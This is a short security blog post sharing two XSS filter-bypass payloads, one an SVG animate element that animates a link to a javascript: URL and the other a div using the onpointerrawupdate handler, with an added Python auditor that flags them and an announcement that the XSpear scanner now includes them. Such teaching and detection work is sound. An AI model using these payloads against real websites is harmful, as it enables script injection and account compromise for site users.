First new XSS Payload of 2020 (svg animate, onpointerrawupdate)

Hi hackers and bug bounty hunters! Recently, two previously unknown XSS payloads were disclosed one after another. They're not very difficult to understand, so I'll share them briefly!

SVG Animate XSS

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values=";javascript:alert(45)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

onpointerrawupdate event handler for XSS

<div onpointerrawupdate=alert(45)>xss</div>
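
An added example, not from the original post or from XSpear: a Python audit of untrusted markup that shows why a name-by-name event-handler blocklist misses `onpointerrawupdate`, and how to flag SVG animation elements that animate `href` to a `javascript:` URL. The blocklist contents, rule names and function names are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed stand-in for an older name-by-name handler blocklist (assumption).
LEGACY_BLOCKLIST = {"onclick", "onerror", "onload", "onmouseover", "onfocus"}
SVG_ANIMATION_TAGS = {"animate", "set"}
URL_ATTRIBUTES = {"href", "xlink:href"}
# The two payloads from this page, used as sample input.
SVG_SAMPLE = ('<svg><animate xlink:href=#xss attributeName=href dur=5s '
              'repeatCount=indefinite keytimes=0;0;1 '
              'values=";javascript:alert(45)&semi;0" />'
              '<a id=xss><text x=20 y=20>XSS</text></a>')
POINTER_SAMPLE = '<div onpointerrawupdate=alert(45)>xss</div>'

def has_script_url(value_list):
    """True if any ';'-separated animation value is a javascript: URL."""
    for item in value_list.split(";"):
        # Browsers ignore whitespace/control characters inside the scheme.
        if re.sub(r"[\x00-\x20]", "", item).lower().startswith("javascript:"):
            return True
    return False

class MarkupAuditor(HTMLParser):
    def __init__(self, handler_check):
        super().__init__()
        self.handler_check = handler_check
        self.findings = []  # (rule, tag, attribute) tuples

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases names and decodes entities such as &semi;
        attr_map = {name: value or "" for name, value in attrs}
        for name in attr_map:
            if self.handler_check(name):
                self.findings.append(("event-handler", tag, name))
        if tag in SVG_ANIMATION_TAGS:
            if attr_map.get("attributename", "").lower() in URL_ATTRIBUTES:
                self.findings.append(("animated-url", tag, "attributename"))
            for key in ("values", "from", "to"):
                if has_script_url(attr_map.get(key, "")):
                    self.findings.append(("script-url", tag, key))

def audit(markup, handler_check=lambda name: name.startswith("on")):
    auditor = MarkupAuditor(handler_check)
    auditor.feed(markup)
    auditor.close()
    return auditor.findings

def legacy_audit(markup):
    return audit(markup, handler_check=lambda name: name in LEGACY_BLOCKLIST)
```

Matching every attribute that starts with `on` covers handlers that browsers add later, which is why an allowlist of permitted attributes is the safer design than a list of known handler names.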

Updated XSpear (1.3.3)

I added these two payloads to XSpear. Please use it after the update. I put them into XSpear about two days ago, I think.

Once you update to 1.3.3, they are included by default : )

gem update XSpear